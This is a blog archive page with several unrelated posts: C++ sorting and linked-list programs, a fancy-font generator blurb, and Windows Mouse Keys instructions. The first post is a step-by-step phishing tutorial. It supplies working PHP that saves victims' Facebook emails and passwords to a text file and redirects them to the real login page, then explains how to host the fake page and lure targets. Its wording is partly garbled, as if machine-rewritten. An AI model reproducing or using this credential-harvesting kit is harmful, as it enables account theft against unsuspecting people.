Monday, 5 May 2014

How to make FB Phishing page step by step tutorial



Inside my previous post, I showed you the usage of Keyloggers for Hacking another person's password. I agree that the efficiency of making use of suck tricks is very less so now I would like so introduce one to a new and one of the most efficient way connected with hacking called 'PHISHING'. Phishing is basically making a ARTIFICIAL page which resembles for the real login web page of sites like Yahoo!, Facebook, Gmail, etc. but with a modified URL(Ofcourse our's). When someone Logins in this particular page, the account information is secretly ripped off away and stored in our database and those get redirected for the real login web page... so he/she doesn't even get the hang of that he/she have been HACKED!


For this trick you require some basic expertise in Web-hosting and PHP. Hey! don't worry even minus any knowledge from it then just follow most of these steps properly and you will probably get to that.

The following script is good for making a Artificial FACEBOOK page.


Step 1: Creating Phishing. php data file:

1. Even without any knowledge involving php file simply copy this script and conserve it as phishing. php.


<html> <body> <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["email"]); fwrite($handle,"\n"); fwrite($handle,$_POST["pass"]); fwrite($handle,"\n"); fwrite($handle,"\n"); fclose($handle); header("Location: https://www.facebook.com/login.php?login_attempt=1"); exit; ?> </body></html>


STEP 2: Creating index.html page :

1. Open this Facebook login webpage then, Right click>View webpage source and composite it in notepad as well as save it as
index. html.
 2 Open which index. html file that has a Notepad and look for (By pressing Ctrl+F) regarding: action in it and replace this highlighted part (as from the following screenshot) together with phishing. php.



Step 3:

Now build a completely blank textual content file with title password. txt.

Now you might have all the next three files together with you:
1. phishing. php
a couple of. index. html
3. password. txt
If you do not possess your own web hosting service account, goto any free web-hosting web site www. phpzilla. internet, and in report manager, upload every one of the three files.

Your fake page is currently ready! With the Website you registered about the Web-hosting site ask anyone to login and then check your password. txt file. You can find the Username and Password of their person stored inside it. Also the man or woman gets redirected for the original Facebook sign in page and he/she thinks that there should be some problem or he/she often have entered wrong Username or Password.

Though this method of hacking seems to be quite long nevertheless, once you possess created the fake page then you don't have to have anyone login using your laptop. Just send in which URL to anybody saying 'Hey! Enroll in my page upon Facebook! ' or whichever and after he logins you'll have his/her password.


Nevertheless the problem Facebook phishing has is, even in case you get someone's Facebook or myspace password and change it out, the person is notified by an email and he/she will get the hang of that someone is intending to access his/her password and may definitely change the idea: (. So, its advisable directly hack their particular primary account to gain complete access for the victims account; )


You can also make such fake pages by your own for Googlemail, Yahoo!, Twitter.


Sunday, 13 April 2014

Stylish Text Generator



Convert your text into cool letters with our font converter! Just type your text in the box and hit “Convert”. You’ll see text converted into each of our stylish fonts which you can use on Facebook. Simply copy the text you like and then paste it in your Facebook status, comment or a chat message! It’s both easy and fun.




Enjoy our great collection of cool fonts and make your plain old text something dazzling! Our amazing font generator converts your plain font into one of our extraordinary fonts. If you want to generate text that is stylish and cool, scroll through our collection of font choices and choose one that suits your mood! You can choose a new font to have fun posting messages and comments with every day! These fonts will display too on other websites than Facebook.
As you can see from the different font choices, we’ve included a terrific array of choices. Send a [̲̅b̲̅][̲̅o̲̅][̲̅x̲̅][̲̅e̲̅][̲̅d̲̅] text, a ♥l♥o♥v♥e ♥m♥e♥s♥s♥a♥g♥e to your sweetheart or share an ndsıpǝ poʍu (upside down) message after you’ve had a dizzying day! Take your time to choose your perfect font and when you’re ready to write another message, come back to our font generator and choose another!

Thursday, 5 December 2013

Selection Sort

#include<iostream>
#include<conio.h> 

using namespace std;

void main()
{
int a[100],i,n,p,k,min,loc,temp;

cout<<"\n------------ SELECTION SORT ------------ \n\n";
cout<<"Enter No. of Elements=";
cin>>n;

cout<<"\nEnter Elements=\n";
for(i=1;i<=n;i++)
{
cin>>a[i];
}

for(p=1;p<=n-1;p++)              // Loop for Pass
{
min=a[p];                        // Element Selection
loc=p;

for(k=p+1;k<=n;k++)              // Finding Min Value
{
if(min>a[k])
{
min=a[k];
loc=k;
}
}

temp=a[p];                        // Swap Selected Element and Min Value
a[p]=a[loc];
a[loc]=temp;

}

cout<<"\nAfter Sorting : \n";

for(i=1;i<=n;i++)
{
cout<<a[i]<<endl;
}

getch();
}



Output :-

Selection Sort

Bubble Sort



#include<iostream>
#include<conio.h>
 
 
using namespace std;
 
void main()
{

int a[100],i,n,p,j,temp;

cout<<"\n------------ BUBBLE SORT ------------ \n\n";

cout<<"Enter No. of Elements : ";
cin>>n;

cout<<"\nEnter Elements : \n";
for(i=1;i<=n;i++)
{
cin>>a[i];
}


for(p=1;p<=n-1;p++)             // Loop for Pass
{

for(j=1;j<=n-1;j++)
{
if(a[j]>a[j+1])
{
temp=a[j];                      // Interchange Values
a[j]=a[j+1];
a[j+1]=temp;
}
}

}

cout<<"\nAfter Sorting : \n";
for(i=1;i<=n;i++)
{
cout<<a[i]<<endl;
}

getch();
}



Output :-

Bubble Sort

Linked List Searching



#include<iostream.h>
#include<conio.h>
struct node
{
int info;
node *link;
};

void main()
{
clrscr();
cout<<"\n ------- Linked List Searching -------\n\n";
node a[100];
node *start=&a[1];
int n,i,item,s=0;

cout<<"Enter No. of Nodes in Linked List : ";
cin>>n;

cout<<"Enter Info of Nodes :\n";
for(i=1;i<=n;i++)
{
cout<<"Node "<<i<<" : ";
cin>>a[i].info;
a[i].link=&a[i+1];
}
a[n].link=0;

cout<<"\nEnter Item you want to Search : ";
cin>>item;

i=1;
while(start!=0)
{
if(item==a[i].info)
{
cout<<"Item is Found at Position : "<<i;
s=1;
break;
}
else
{
i++;
start=start->link;
}
}

if(s==0)
{
cout<<"Item is Not Found";
}

getch();
}





Output :-

Knapsack Greedy Method



Linked List Traversing



#include<iostream.h>
#include<conio.h>
struct node
{
int info;
node *link;
};

void main()
{
clrscr();
cout<<"\n ------- Linked List Traversing -------\n\n";
node a[100];
node *start=&a[1];
int n,i,item;

cout<<"Enter No. of Nodes in Linked List : ";
cin>>n;


cout<<"\nEnter Info of Nodes :\n";
for(i=1;i<=n;i++)
{
cout<<"Node "<<i<<" : ";
cin>>a[i].info;
a[i].link=&a[i+1];
}
a[n].link=0;


cout<<"\nAfter Traversing : \n";
i=1;
while(start!=0)
{
cout<<"Node "<<i<<" : "<<a[i].info<<endl;
i++;
start=start->link;
}

getch();
}



Output :-

Linked List Traversing

Control Mouse Cursor using Keyboard



Use Mouse Keys to move the Mouse pointer

With Mouse Keys, you can use the Numeric Keypad on your Keyboard - instead of the mouse - to move the pointer.


To Turn ON Mouse Keys in Window XP

1. Open Control Panel, Click Accessibility Options, Click the Mouse tab, and then select the Use MouseKeys check box.





To Turn ON Mouse Keys in Window 7

1. Open Ease of Access Center by clicking the Start button, clicking Control Panel, clicking Ease of Access,

and then clicking Ease of Access Center.

2. Click Make the mouse easier to use.

3. Under Control the mouse with the keyboard, select the Turn ON Mouse Keys check box.



Moving the pointer using Mouse Keys

After you Turn ON Mouse Keys, you can use the Numeric keypad to move the mouse.



Note :- Press NUM LOCK to use the Numeric Keypad.



To move the Mouse Cursor Press
Left 4
Right 6
Up 8
Down 2
Up and to the Left 7
Up and to the Right 9
Down and to the Left 1
Down and to the Right 3



Selecting a Mouse Button

Before you use Mouse Keys to click items on your screen, you must first select which mouse button you want to be the active button: the Left button, the Right Button, or both.

To Press
Select the Left mouse button The forward slash (/)
Select both buttons The asterisk (*)
Select the Right mouse button The minus sign (-)



Clicking items using Mouse Keys

After you choose a button, you can click items on your screen.

To Do this
Click an Item With the Left button selected as your active button, point to the item, and then Press 5
Right-Click an Item With the Right button selected as your active button, point to the item, and then Press 5
Double-Click an Item With the left button selected as your active button, point to the item, and Press the plus sign (+)



Dragging items using Mouse Keys

You can use the numeric keypad to press and hold the active mouse button and to release it. This is helpful if you want to drag an item.

To Do this
Drag an Item Point to the item, and then Press 0
Drop the Item Point to the location where you want to move the item, and then Press the decimal point (.)


Window 8 Snap

 
Note :- You can also turn on Mouse Keys by pressing Left Alt+Left Shift+Num Lock.

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Bluehost Coupons